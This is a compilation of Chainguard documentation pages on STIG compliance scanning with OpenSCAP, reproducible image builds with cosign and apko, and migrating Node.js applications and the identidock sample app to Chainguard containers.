The goal for this new STIG is that it will help customers confidently and securely integrate Chainguard Containers into their workflows. This conceptual article aims to give a brief overview of what STIGs are and how they can be valuable in the context of container images. It also includes instructions on how to get started with Chainguard’s STIG for the GPOS SRG. Getting Started The recommended way to get started with Chainguard’s STIG for the GPOS SRG is to use the Chainguard openscap Container. This container image includes the openscap tool itself, the oscap-docker libraries, and the Chainguard GPOS STIG profile. This image is built with the same capabilities and low-to-zero CVEs as every other Chainguard Container, and makes the openscap tool — which can be difficult to set up — more portable. The following instructions assume that you have Docker installed and running on your system, and are intended to be performed on a non-production system, similar to the process outlined in DISA’s Container Hardening Whitepaper. For ease of use, we’ll use the datastream file sourced from the Chainguard STIGs repository, and available within Chainguard’s openscap container image. This file serves as a sort of checklist, outlining each of the requirements that must be met in order to conform with the STIG. If you’d like, you can download this datastream file — named ssg-chainguard-gpos-ds.xml — with a command like the following: curl -fsSLO https://raw.githubusercontent.com/chainguard-dev/stigs/main/gpos/xml/scap/ssg/content/ssg-chainguard-gpos-ds.xml The -O option in this example will save the file’s contents to a local file also named ssg-chainguard-gpos-ds.xml in your working directory. You can then view the checklist locally. We’ll refer to the openscap container image as the scan image, and the target image we’ll be scanning will be cgr.dev/chainguard/wolfi-base:latest. First, start the target image: docker run --name target -d cgr.dev/chainguard/wolfi-base:latest tail -f /dev/null Next, run the scan image against the target image. docker run -i --rm -u 0:0 --pid=host \ -v /var/run/docker.sock:/var/run/docker.sock \ -v $(pwd)/out:/out \ --entrypoint sh \ cgr.dev/chainguard/openscap:latest-dev <<_END_DOCKER_RUN oscap-docker container target xccdf eval \ --profile "xccdf_basic_profile_.check" \ --report /out/report.html \ --results /out/results.xml \ /usr/share/xml/scap/ssg/content/ssg-chainguard-gpos-ds.xml _END_DOCKER_RUN Note that this is a highly privileged container since we’re scanning a container being run by the host’s Docker daemon. The results of the scan will be written to a new subdirectory named out/ within the current working directory. The report.html file will contain a human-readable report of the scan results, and the results.xml file will contain the raw results of the scan. What are STIGs? As mentioned previously, “STIG” is an acronym that stands for Security Technical Implementation Guide. A STIG is akin to the implementation of a Security Requirements Guide (SRG) that a security administrator can go through to ensure that a given piece of software has been hardened against cybersecurity threats. A STIG is typically written by the developer or vendor of the given piece of software against a published DOD Security Requirements Guide (SRG). STIGs are presented in the XCCDF (Extensible Configuration Checklist Description Format), allowing them to be ingested into a SCAP-validated tool to validate that a given target is in compliance with them.
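For example, the datastream file downloaded earlier is itself XCCDF content, and you can inspect the profiles it defines before running a full evaluation (a minimal sketch assuming the OpenSCAP tools are installed locally; you could also run the same command inside the Chainguard openscap container):

```
# Show the benchmarks and profiles contained in the Chainguard GPOS STIG datastream
oscap info ssg-chainguard-gpos-ds.xml
```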
After drafting the STIG, the vendor will submit it to the Defense Information Systems Agency (DISA), an agency within the DoD. One of DISA’s responsibilities is publishing and maintaining STIGs on the DoD Cyber Exchange website, and the process from a STIG being submitted to it being published by DISA can take years. As of this writing, DISA has published over 450 STIGs for a wide variety of software applications. How STIGs can be used to harden container images STIGs are typically published for hardware, firmware, and specific applications. However, in recent years containerization has grown in popularity and is now the modern way to deploy applications. This has resulted in a gap in clear instructions on how to securely deploy containerized applications. Chainguard produces hardened, minimal container images containing few to zero CVEs. Because of this, they adhere to many compliance standards where there’s a control for vulnerability or risk management, including FedRAMP and PCI DSS v4.0. For many risk management frameworks, the system categorization will result in varying levels of hardening guidelines. Using FedRAMP as an example, FIPS-199 defines the security categorization which will result in a baseline set of controls (defined in NIST 800-53) that must be implemented. Because the NIST 800-53 controls are technology-neutral, the STIGs published by DISA provide technology-specific configurations on how to satisfy the applicable NIST 800-53 control set. As stated in the CM-6 (a) Requirement 1 of the FedRAMP System Security Plan: “The service provider shall use the DoD STIGs to establish configuration settings; Center for Internet Security up to Level 2 (CIS Level 2) guidelines shall be used if STIGs are not available; Custom baselines shall be used if CIS is not available.” However, the requirements for how a STIG applies to a container image are rather unclear. For example, some controls apply to the host operating system instead of the image. Similarly, other controls apply to the container runtime instead of the container itself. Knowing what controls are relevant for containers and how to check for them in a STIG is key to achieving and maintaining FedRAMP compliance. DISA understands that containers have different requirements than traditional operating systems. In an effort to highlight these differences, the DoD DevSecOps Initiative released the Container Hardening Process Guide which describes the Initiative’s approach to hardening images and how other agencies should handle applying STIGs to containers. Appendix C of the Hardening Process Guide highlights an important point about STIG compliance for containers: “With a properly locked down hosting environment, containers inherit most of the security controls and benefits from infrastructure to host OS-level remediation requirements.” Deploying containers on a STIG hardened host provides many of the security features that are difficult or sometimes impossible to implement inside a container. What’s left then is the application-level security configuration — in particular vulnerability remediation — which Chainguard provides through our guaranteed vulnerability remediation SLAs. False positives and the General Purpose OS STIG Here we’ve assembled several explanations for requirements from Chainguard’s General Purpose Operating System STIG that are likely to cause false positives when scanning containers, as well as the rationale for those requirements.
By disambiguating these false positives, the following sections should be helpful to any administrators deploying containers in environments where STIG hardening is necessary, both as a means to understand where to expend effort performing hardening and for discussions with assessors and compliance personnel. Auditing Auditing capabilities for Linux containers are implemented by the underlying host’s audit configuration. In Linux, the auditing program auditd leverages multiple functions in the running kernel through the Linux Auditing System to capture runtime information such as starting and stopping processes, opening sockets, and accessing files. Linux containers use their host’s kernel, making it impossible to install and operate a separate auditing package inside the container itself. Instead, auditing information must be configured and collected through the auditing configuration of the host. Once configured, logs of container actions are written to the host’s audit log files and are readable only by the host superuser account. These logs must be collected from the host for incident response and reporting. Storage capacity limits, audit process monitoring, remote upload of logs, and associated alerts are the responsibility of the host where the containers are running. Isolation Containers provide process isolation by executing their applications in a constrained environment using the Linux Namespace and cgroup subsystems. Inside the namespace, container processes are only permitted to access a limited set of system resources defined when the container is launched. Processes are further restricted by limits imposed through the cgroup for access to system resources such as system memory or CPU use. Together, namespaces and cgroups isolate security functions of the host operating system from non-security functions of applications running inside the container. This separation ensures that container failures caused by processing invalid inputs or other runtime errors do not directly impact the operation of the host and its security functions. In the event of a container failure during initialization or shutdown, for example, the host operating system’s security capabilities will continue to function as configured. Minimal container images Chainguard Containers contain only the minimal software needed for the container to perform its intended function. Nonessential capabilities such as package managers, shell environments, executables, and process launching functions have been removed from many Chainguard Containers and may not be installed once the container is running. This limited implementation means that only the software necessary for operation can run in the container and restricts the installation of additional software on the image during operation. Be sure to have fixed permissions on libraries and executable files in place so that any software installed can’t be modified. The host’s container execution environment further reduces the risk of unauthorized modification of software through Linux container isolation capabilities including namespaces and cgroups. These restrictions prevent unauthorized modification of the host operating system environment. Address Space Layout Randomization (ASLR) ASLR configuration is the responsibility of the host operating system on which containers run. Applications running within a container on a host that has ASLR enabled will automatically be protected by the configuration.
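If you want to confirm this inherited protection on a given host, you can check the kernel’s ASLR setting before launching containers (a minimal sketch for a typical Linux host; a value of 2 indicates full randomization is enabled):

```
# Check that address space layout randomization is enabled on the container host
sysctl kernel.randomize_va_space
```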
No additional action is needed to ensure that container-based applications are protected. Host firewall Linux containers inherit the firewall configuration of their host operating system which dictates which ports on the container can be accessed from the network. Selection of which ports to make accessible on the applications running on the container is the responsibility of the host firewall configuration — an additional application-level firewall inside the container is not necessary. Host filesystem Linux containers use the host’s filesystem for storage of their files and configuration. To protect data at rest inside containers from unauthorized access or modification, you must modify the host operating system’s configuration. As an example, one might set up encrypted virtual filesystems. The host filesystem is also responsible for the size, utilization, and capacity of the physical disks that are used by containers running on that host. Vulnerability scanning The team deploying the container is also responsible for scanning it for vulnerabilities. This scanning can be executed from the host operating system or against the container image when it is stored in a registry. Continuous scanning can be used to detect vulnerabilities that have been identified / announced since the previous scan and determine when updated images should be built and deployed in the environment. Time Linux containers inherit the system time from the underlying host; likewise, containers don’t operate their own separate time services. The host owner is responsible for configuring the host’s time service to generate the timestamp used by its auditing system, perform periodic synchronization, and ensure that only authorized time servers are used as the authoritative source. Time synchronization of the host clock is automatically reflected in the time used by the container. STIGs These containers can be validated against the General Purpose Operating System STIG and other applicable STIGs using the OpenSCAP toolset. OpenSCAP can validate configuration of container images by reviewing the configuration of the image filesystem and can perform interactive checks by executing commands against running containers. Learn more Chainguard’s STIG hardened FIPS Containers are now generally available. You can check out our STIG repo or contact us for more information. If you’d like to learn more about how Chainguard Containers can help you meet FedRAMP compliance, we encourage you to refer to our overview of Chainguard’s FIPS-ready container images. --- ### Reproducibility and Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/repro/ Last Modified: May 20, 2024 Clarification In this video we mention needing to keep copies of old APKs in order to be able to recreate images. This wasn’t fully accurate — in fact we do keep all our previously issued APKs, so you can build images from months (and in the future, years) ago without issue. We currently retain all of these package versions indefinitely (only servicing latest), but in the future we may age things out just to manage the size of the index. 
Tools used in this video cosign apko diffoci Commands Retrieving the build configuration for the latest version of nginx: cosign verify-attestation \ --type https://apko.dev/image-configuration \ --certificate-oidc-issuer https://token.actions.githubusercontent.com \ --certificate-identity https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \ cgr.dev/chainguard/nginx:latest | jq -r .payload | base64 -d | jq .predicate > latest.apko.json Building the image: apko publish latest.apko.json ttl.sh/nginx-repro Transcript Okay, so I want to talk about a topic that I think is hugely important to engineering reliability and security, but doesn’t get talked about very much. And that’s reproducibility. Reproducibility is basically the idea that I run the same build twice, I should get the same thing out. And that sounds trivial, but it’s not. For true reproducibility, we want things to be binary identical. That is, I run the same build twice, and I get the same thing out down to the last bit. We also want somebody else in a different time and place to be able to run the same build and get exactly the same thing out again. So this means we need to control versioning, not just the source code and inputs, but also the build tooling. Because if you run with a different version of your build tool, you could well get a different result. But typically where things go wrong is you have unique IDs or timestamps somewhere in your build. And of course, that causes a different result on each run. Now, reproducibility is important to us at Chainguard, and I wanted to show how you can reproduce Chainguard images yourself. So, to the terminal. Okay, so let’s start by pulling the NGINX image. Now, the interesting bit here is this line here. So this is the digest for the NGINX image. The digest is basically a SHA hash of the image, so it uniquely specifies that image. If we manage to recreate this image, we should end up with exactly the same SHA hash. Okay, and the way we’re going to try to recreate it is we’re going to start by using cosign to get the apko image configuration. So this is an attestation that includes the build config to build that image. And what we’re saying here is this attestation should have been signed using the certificate for the corresponding GitHub action, and the identity should correspond to the workflow that created this attestation. Here we specify the image we’re interested in. So here we’ve got nginx:latest. Of course, you can change that for whatever image you’re interested in. We could also have specified the full SHA there. That would have made sense as well. We then extract the payload section from the JSON that gets returned. We deconvert that from base64, and then we pull out the predicate section to finally give us our JSON file that includes our apko. So let’s run that. Okay, and we get some output just telling us that it has managed to successfully verify the attestation, so we know it’s genuine. And let’s take a look at what it’s created. So this is our apko file. It’s a pretty simple build file. Apko is a very simple build system. Basically, all you can do is specify a list of APK packages to install in the image plus some metadata. So at the top there, you saw some stuff relating to UNIX accounts to create, some annotations to add to the image, the architectures we’re going to build for, the CMD line for the Docker file, and then all these lists of versioned APK dependencies. And this is the full list of dependencies. 
So it’s not the case that libgcc is going to pull in another dependency that’s not listed here. This is the full list. And they’re all coming from packages.wolfi.dev, as we expect. Also set an ENTRYPOINT and some environment stuff. And that’s about it. Okay, so let’s try running apko with that file. We’re actually going to call apko publish. So what we’re seeing here is apko publish, which is going to build from this latest.apko.json file. And then it’s going to publish the image that results to this repo, ttl.sh/nginx-repro. So ttl.sh, if you’ve not seen it, it’s basically a free to use Docker registry that you can upload anything to, but it only sits there for a short amount of time. So it’s a temporary registry for testing things if you like. And that’s from Replicated. So thank you very much, Replicated. Okay, so what’s happening here? I clicked run there. And we’re building images for both AMD64 and ARM64. We see it installing all the packages. And in fact, you’ll see that twice because, of course, we’re building two images. Also building some of the other container stuff and SBOMs for these images. And that’s about it. Now, important bit is at the bottom here. Here we have our SHA again. So this is the SHA of the image it’s created. And it’s f705. I’ve forgotten what it was before. So let’s download nginx again and see if it matches. And it does. So that’s pretty cool. We’ve managed to recreate this Chainguard image bit for bit and push it to this repo. And it’s relatively unusual for build tooling to be able to do that with container images. But here we’ve done it with apko and Chainguard images. There are, however, a few things to be aware of. So if I take a look at this latest.apko.json, first thing to be aware of is all these APKs are specified as specific versions that were used. Now, Wolfi is a rolling repo. We don’t keep older versions of packages for very long. So in six months time, I’m unlikely to be able to download some of these packages at these exact versions. So if you want to be able to recreate this, you’d have to have access to the old packages somehow. The second one is you may think, well, OK, but can I reproduce these packages from source? And yes, you can. But the issue is you won’t end up with binary identical versions because the APKs themselves include signatures inside them that have been signed using Wolfi’s signing key, and of course you won’t have access to the private signing key. So you’re going to be unable to create a binary identical version of the APKs. Finally, do you remember what I said earlier about build tooling? So this was created with this version of apko, which I actually built from the head of the repo. I did originally try with a different version that was released and that actually failed to reproduce. And I got a different digest because it handled links slightly differently. So a minor difference in the build tooling caused the binaries to be different. So one thing I would say is if you’re playing with reproducing images, there’s a really great tool called diffoci. And if you run diffoci on your images, then it’ll tell you exactly what the differences between two images are. So if I run it here on these two images, it basically just tells me, yeah, those match. But if I run it on different images, it’ll give you a full list of which files inside the images are different and where they’re different. So a really, really useful tool there.
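For reference, an invocation along the lines of what the video describes might look like this (a sketch; the image references follow the example above, and diffoci’s flags may vary between releases):

```
# Compare the published Chainguard image with the locally rebuilt copy pushed to ttl.sh
diffoci diff docker://cgr.dev/chainguard/nginx:latest docker://ttl.sh/nginx-repro
```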
And it’ll also allow you to filter out things like timestamp differences if you’re not interested in them. OK, so that was a long way of saying that Chainguard images are reproducible and you can even reproduce them yourselves. Please do give it a go and let me know how you get on. --- ### Migrating to Node.js Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating-node/ Last Modified: May 9, 2024 Tags: Chainguard Containers, Product, Migration Chainguard Containers are built on top of Wolfi, a Linux undistro designed specifically for containers. Our Node.js images have a minimal design (sometimes known as distroless) that ensures a smaller attack surface, which results in smaller images with few to zero CVEs. Nightly builds deliver fresh images whenever updated packages are available, which also helps to reduce the toil of manually patching CVEs. What is Distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi OS? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. This article is intended as a guide to porting existing Dockerfiles for Node.js applications to a Chainguard Containers base. Node.js Chainguard Containers The Node.js images come in two main flavours: runtime images intended for production usage and builder images intended for use in the build-step of multi-stage builds. The builder images are distinguished by the -dev suffix (e.g., latest-dev). The production images are intentionally as minimal as possible. They have enough dependencies to run a Node.js application but no more. There is no package manager or shell, which reduces the attack surface of the image, but can also make it difficult to extend the image. The builder images have more build tooling as well as a shell and package manager, allowing them to be easily extended. We still aim to keep CVE counts as low as possible in the builder images and they can be used in production if necessary (such as when the application requires extra system dependencies at runtime), but we recommend using the builder image as the first step in a multi-stage build with the production image as the base for the final image. This extremely minimal approach to the runtime image is sometimes known as “distroless”. For a deeper exploration of distroless images and their differences from standard base images, refer to the guide on Getting Started with Distroless images. Migrating From Other Distributions Dockerfiles will often contain commands specific to the Linux distribution they are based on. Most commonly this will be package installation instructions (e.g. apt vs yum vs apk) but also differences in default shell (e.g. bash vs ash) and default utilities (e.g. groupadd vs addgroup). Our high-level guide on Migrating to Chainguard Containers contains details about distro-based migration and package compatibility when migrating from Debian, Alpine, Ubuntu and Red Hat UBI base images. Installing Further Dependencies Sometimes your applications will require further dependencies, either at build-time, runtime or both.
Wolfi has a large number of software packages available, so you are likely to be able to install common packages via apk add, but be aware that packages may be named differently than in other distributions. The easiest way to search for packages is via apk tools. For example: docker run -it --rm cgr.dev/chainguard/wolfi-base f273a9aa3242:/# apk update fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz [https://packages.wolfi.dev/os] OK: 53914 distinct packages available f273a9aa3242:/# apk search cairo cairo-1.18.0-r1 cairo-dev-1.18.0-r1 cairo-gobject-1.18.0-r1 cairo-static-1.18.0-r1 cairo-tools-1.18.0-r1 harfbuzz-8.4.0-r1 harfbuzz-dev-8.4.0-r1 pango-1.52.2-r1 pango-dev-1.52.2-r1 py3-cairo-1.26.0-r0 py3-cairo-dev-1.26.0-r0 These packages can then be easily added to your Dockerfile. For more searching tips, check the Searching for Packages section of our base migration guide. Differences to Docker Official Image If you are migrating from the Docker Official Image there are a few differences that are important to be aware of. Our images run as the node user with UID 65532 by default. If you need elevated privileges for a task, such as installing a dependency, you will need to change to the root user. For example, add a USER root statement into a Dockerfile. For security reasons you should make sure that the production application runs with a lower privilege user such as node. WORKDIR is set to /app which is owned by the node user. The Docker Official images have a “smart” entrypoint that interprets the CMD setting. So docker run -it node will launch the Node.js interpreter but docker run -it node /bin/sh will launch a shell. The latter does not work with Chainguard Containers. In the non -dev images, there is no shell to launch, and in the -dev images you will need to change the entrypoint e.g. docker run --entrypoint /bin/sh -it cgr.dev/chainguard/node. The image has a defined NODE_PORT=3000 environment variable which can be used by applications. Our Node.js images include dumb-init which can be used to wrap the Node process in order to handle signals properly and allow for graceful shutdown. You can use dumb-init by setting an entrypoint such as: ENTRYPOINT ["/usr/bin/dumb-init", "--"] In general there are many fewer libraries and utilities in the Chainguard Container. You may find that your application has an unexpected dependency which needs to be added into the Chainguard Container. Migration Example This section has a short example of migrating a Node.js application with a Dockerfile building on node:latest to use the Chainguard Node.js Containers. The code for this example can be found on GitHub. Our starting Dockerfile uses the node:latest image from Docker Hub in a single-stage build:

FROM node:latest
ENV NODE_ENV production
WORKDIR /usr/src/app
COPY package.json .
RUN npm install
USER node
COPY . .
EXPOSE 3000
CMD npm start

If you’ve cloned the GitHub repository, you can build this image with: docker build -t node-classic-image -f Dockerfile-classic . Directly porting to Chainguard Containers with the least number of changes results in this Dockerfile:

FROM cgr.dev/chainguard/node:latest-dev
ENV NODE_ENV production
WORKDIR /usr/src/app
COPY package.json .
RUN npm install
USER node
COPY . .
EXPOSE 3000
ENTRYPOINT npm start

Here we’ve changed the image to cgr.dev/chainguard/node:latest-dev and the CMD command became ENTRYPOINT. We can still do better in terms of size and security.
A multi-stage Dockerfile would look like:

FROM cgr.dev/chainguard/node:latest-dev AS builder
ENV NODE_ENV production
WORKDIR /usr/src/app
COPY package.json .
RUN npm install
USER node
COPY . .
FROM cgr.dev/chainguard/node:latest
COPY --from=builder --chown=node:node /usr/src/app /app
EXPOSE 3000
ENV NODE_ENV=production
ENV PATH=/app/node_modules/.bin:$PATH
WORKDIR /app
ENTRYPOINT ["/usr/bin/dumb-init", "--"]
CMD ["node", "app.js"]

If you’ve cloned the GitHub repository, you can build this image with: docker build -t node-multi-image -f Dockerfile-multi . The advantages of this build are:
- We are using dumb-init so the container shuts down cleanly in response to docker stop.
- We do not have all the build tooling in the final image, resulting in a smaller and more secure production image.

Note that in a production app you may want to use a package-lock.json file and the npm ci command instead of npm install to ensure the correct version of all dependencies is used. Additional Resources The Node.js image documentation contains full details on our images, including usage documentation, provenance and security advisories. The How to Port a Sample Application to Chainguard Containers article contains an example of porting a Node.js Dockerfile for a legacy application. The How to Migrate a Node.js Application to Chainguard Containers video works through an example of porting a Node.js Dockerfile. Bret Fisher has an excellent guide to creating Node.js container images, including advice for using distroless. The Debugging Distroless guide contains important information for debugging issues with distroless images. You can also refer to the Verifying Containers resource for details around provenance, SBOMs, and image signatures. --- ### How to Port a Sample Application to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/porting-apps-to-chainguard/ Last Modified: February 5, 2025 Tags: Chainguard Containers, Product Porting Key Points
- Chainguard’s distroless Containers have no shell or package manager by default. This is great for security, but sometimes you need these things, especially in builder images. For those cases we have -dev variants (such as cgr.dev/chainguard/python:latest-dev) which do include a shell and package manager.
- Chainguard Containers typically don’t run as root, so a USER root statement may be required before installing software.
- The -dev variants and wolfi-base / chainguard-base use BusyBox by default, so any groupadd or useradd commands will need to be ported to addgroup and adduser.
- The free Starter tier of Containers provides :latest and :latest-dev versions. Our paid Production Containers offer tags for major and minor versions.
- We use apk tooling, so apt install commands will become apk add. Chainguard Containers are based on glibc and our packages cannot be mixed with Alpine packages.
- In some cases, the entrypoint in Chainguard Containers can be different from equivalent container images based on other distros, which can lead to unexpected behavior. You should always check the image’s specific documentation to understand how the entrypoint works.
- When needed, Chainguard recommends using a Base Container like chainguard-base or a -dev variant to install an application’s OS-level dependencies. Although -dev variants are still more secure than most popular container images based on other distros, for increased security in production environments we recommend combining them with a distroless variant in a multi-stage build.
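As a compact illustration of several of these points, a fragment like the following shows the typical translations involved (a minimal sketch; the file name, base image, package, and user names here are placeholders rather than part of the identidock example that follows):

```
cat > Dockerfile.sketch <<EOF
FROM cgr.dev/chainguard/python:latest-dev
# -dev variants don't run as root, so switch users before installing packages
USER root
# apt-get install becomes apk add; groupadd/useradd become BusyBox addgroup/adduser
RUN apk update && apk add curl && \
    addgroup -S app && adduser -S -G app app
# Drop back to an unprivileged user for runtime
USER app
EOF
```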
The Sample Application The application in question is identidock. This application was written for the book Using Docker about ten years ago, which shows that we can still migrate software of this age to a new container while realizing the benefits of a no-to-low CVE count. The application itself will create identicons for a user name, similar to what GitHub generates for users with no avatar. It was designed at the time to demonstrate a “microservices” approach, and as such it’s made up of 3 services:
- The main identidock service, which takes the requests and talks to the dnmonster service and the redis cache
- A NodeJS application which creates the identicons
- Redis which is used as a simple cache

The services are put together as shown in the below diagram. The user only talks to the identidock service. The identidock service will first check the cache to see if it has already created an identicon for the input and, if not, requests a new identicon from the dnmonster service. The identicon is then returned to the user and saved to the cache if required. The book walked through using various orchestrators to deploy the application, some of which have since fallen out of usage (anyone remember fleet?). For the sake of this tutorial, we’ll use Docker Compose, which is arguably the simplest surviving orchestrator covered in the book. The first task was to get the 10-year-old application building and running again. As it was a simple example application, this was thankfully straightforward and mainly required bumping versions of dependencies and a couple of cases of replacing unmaintained libraries. For a larger project, this may well have been a major effort. The original code can be found on the using-docker GitHub repository and the updated working version (prior to moving to Chainguard Containers) can be found on the v1 branch of the repository for this tutorial. In order to follow along with the tutorial, please clone the code and switch to the v1 branch:

git clone https://github.com/chainguard-dev/identidock-cg.git
cd identidock-cg
git switch v1

Updating the Node.js Microservice To begin, we’ll update the heart of the application – the dnmonster service. dnmonster is based on monsterid.js by Kevin Gaudin. The dnmonster container hosts an API which returns an identicon based on the input it’s given.

docker run -d -p 8080:8080 amouat/dnmonster
curl --output ./monster.png 'localhost:8080/monster/wolfi?size=100'

In this example, we give dnmonster the input “wolfi”, for which it will produce an identicon image. The version of the code on the v1 branch already contains a few updates from the original code; as well as bumping versions, the codebase was moved from the old and sporadically maintained restify module to the more modern express module. The Dockerfile for this version of the dnmonster service can be found in the dnmonster folder:

FROM node
RUN apt-get update && apt-get install -yy --no-install-recommends \
    libcairo2-dev libjpeg62-turbo-dev libpango1.0-dev libgif-dev \
    librsvg2-dev build-essential g++
# Create non-root user
RUN groupadd -r dnmonster && useradd -r -g dnmonster dnmonster
RUN install -d -o dnmonster -g dnmonster /home/dnmonster
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app
COPY package.json /usr/src/app/
RUN npm install
COPY ./src /usr/src/app
RUN chown -R dnmonster:dnmonster /usr/src/app
USER dnmonster
EXPOSE 8080
CMD [ "npm", "start" ]

The container image can be built with: cd dnmonster docker build --pull -t dnmonster .
Looking at this image: docker images dnmonster REPOSITORY TAG IMAGE ID CREATED SIZE dnmonster latest 3337171ebb44 4 minutes ago 1.79GB We can also run the Grype scanning tool to investigate if there are any known vulnerabilities present in the image: grype docker:dnmonster ✔ Loaded image dnmonster:latest ✔ Parsed image sha256:17ad85081f0b4151b30556e2750ceab3222495cfc32caec2bf6e7be3647de78e ✔ Cataloged contents 5c969fe3503a9f5e6c83117d0efa79af70380eac2abe66a756eae00351972352 ├── ✔ Packages [788 packages] ├── ✔ File digests [20,143 files] ├── ✔ File metadata [20,143 locations] └── ✔ Executables [1,343 executables] ✔ Scanned for vulnerabilities [600 vulnerability matches] ├── by severity: 7 critical, 103 high, 290 medium, 49 low, 500 negligible (195 unknown) └── by status: 7 fixed, 1137 not-fixed, 544 ignored ... This tells us that (at the time of writing) the image is 1.79 GB in size and has hundreds of known vulnerabilities. The first step in moving to Chainguard Containers is to try switching the container image name to check if anything breaks. In this case, we’ll begin with the development variant of the Node image. Change the first line of the Dockerfile from:

FROM node

To:

FROM cgr.dev/chainguard/node:latest-dev

Unlike the cgr.dev/chainguard/node:latest image, the :latest-dev version includes a shell and package manager, which we will need for some of the build steps. In general, it’s better to use the more minimal :latest version where possible in order to keep the size down and reduce the tooling available to attackers. Often the :latest-dev container image can be used as a build step in a multi-stage build, with a more minimal image such as :latest used in the final production image. If you try building this image, you’ll find that it breaks in several places. The container image needs to install various libraries so that it can compile the node-canvas dependency, and this looks a bit different in Debian than it does in Wolfi (the OS powering Chainguard Containers). In Wolfi, we first need to switch to the root user to install software and we use apk add instead of apt-get. We then need to figure out the Wolfi equivalents of the various Debian packages, which may not always have a one-to-one correspondence. There are tools to help here – you can consult our migration guides and use apk tools (like apk search libjpeg), but searching the Wolfi GitHub repository for package names will often provide you with what you’re looking for. Make these changes by replacing the RUN apt-get … line with the following RUN apk update … line and adding a USER root line. The start of the Dockerfile should look like this:

FROM cgr.dev/chainguard/node:latest-dev
USER root
RUN apk update && apk add \
    cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc \
    librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev \
    libfontconfig1

The next change we need to make is to the RUN groupadd … line. Chainguard Containers use BusyBox by default, which means groupadd needs to become addgroup. Rewrite the line so that it looks like this:

RUN addgroup dnmonster && adduser -D -G dnmonster dnmonster

Finally, the default entrypoint for the Chainguard container image is /usr/bin/node. If we leave the CMD as it is, it will be interpreted as an argument to node, which isn’t what we want. The Docker official image uses an entrypoint script to interpret commands, but this isn’t available in the cgr.dev/chainguard/node:latest-dev image.
The easiest fix is to change the CMD command to ENTRYPOINT which will override the /usr/bin/node command:

ENTRYPOINT [ "npm", "start" ]

Once you’ve made all these changes, you should have a Dockerfile that looks like:

FROM cgr.dev/chainguard/node:latest-dev
USER root
RUN apk update && apk add \
    cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc \
    librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev \
    libfontconfig1
# Create non-root user
RUN addgroup dnmonster && adduser -D -G dnmonster dnmonster
RUN install -d -o dnmonster -g dnmonster /home/dnmonster
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app
COPY package.json /usr/src/app/
RUN npm install
COPY ./src /usr/src/app
RUN chown -R dnmonster:dnmonster /usr/src/app
USER dnmonster
EXPOSE 8080
ENTRYPOINT [ "npm", "start" ]

At this point, we have a version of dnmonster that works and is equivalent to the previous version. We can build this image: docker build --pull -t dnmonster-cg . ... And investigate it again: docker images dnmonster-cg REPOSITORY TAG IMAGE ID CREATED SIZE dnmonster-cg latest 5b785d38a022 About a minute ago 1.55GB grype docker:dnmonster-cg ✔ Vulnerability DB [updated] ✔ Loaded image dnmonster-cg:latest ✔ Parsed image sha256:4795459b2f4a28bb721b19b798b4f78d6affb6b2a43096f8752576e6ce3fcd2c ✔ Cataloged contents aa53bb57b8e994e65de7f3e19da6b1945a86005fe76961383166248aad56f6fe ├── ✔ Packages [599 packages] ├── ✔ File digests [14,204 files] ├── ✔ File metadata [14,204 locations] └── ✔ Executables [733 executables] ✔ Scanned for vulnerabilities [2 vulnerability matches] ├── by severity: 0 critical, 0 high, 0 medium, 0 low, 0 negligible (2 unknown) └── by status: 0 fixed, 2 not-fixed, 0 ignored NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY git 2.48.1-r0 apk CVE-2024-52005 Unknown python-3.13 3.13.1-r5 apk CVE-2025-0938 Unknown So the image is a bit smaller at 1.55GB, but more importantly, we’ve vastly reduced the number of vulnerabilities. There are now only 2 known vulnerabilities. But we can still do more. In particular, although 1.55GB is smaller than the previous version, it’s still a large image. To get the size down, we can use a multi-stage build where the built assets are copied into a minimal Production Container, which doesn’t include build tooling or dependencies required during development. Ideally, we would use the cgr.dev/chainguard/node:latest image for this, but we also need to install the dependencies for node-canvas, which means we need an image with apk tools. Normally it’s recommended to use a :latest-dev image for this, but in node’s case, the :latest-dev image is relatively large due to the inclusion of build tooling, such as C compilers, that can be required by Node modules. Instead, we’re going to use the wolfi-base image and install nodejs as a package.
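If you want to confirm the package name before editing the Dockerfile, you can search the Wolfi index from a throwaway wolfi-base container (a sketch; this assumes the image’s default command can be overridden with a shell one-liner, and available package versions will differ over time):

```
# List Node.js packages available in the Wolfi repository
docker run --rm cgr.dev/chainguard/wolfi-base sh -c "apk update >/dev/null && apk search nodejs"
```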
To do this, replace the Dockerfile with the following:

FROM cgr.dev/chainguard/node:latest-dev AS build
USER root
RUN apk update && apk add \
    cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc \
    librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev \
    libfontconfig1

# Create non-root user
RUN addgroup dnmonster && adduser -D -G dnmonster dnmonster
RUN install -d -o dnmonster -g dnmonster /home/dnmonster

RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app
COPY package.json /usr/src/app/
RUN npm install
COPY ./src /usr/src/app
RUN chown -R dnmonster:dnmonster /usr/src/app

USER dnmonster
EXPOSE 8080
ENTRYPOINT [ "npm", "start" ]

FROM cgr.dev/chainguard/wolfi-base
RUN apk update && apk add nodejs \
    cairo-dev libjpeg-turbo-dev pango-dev giflib-dev \
    librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev
WORKDIR /app
COPY --from=build /usr/src/app /app
EXPOSE 8080
ENTRYPOINT [ "node", "server.js" ]

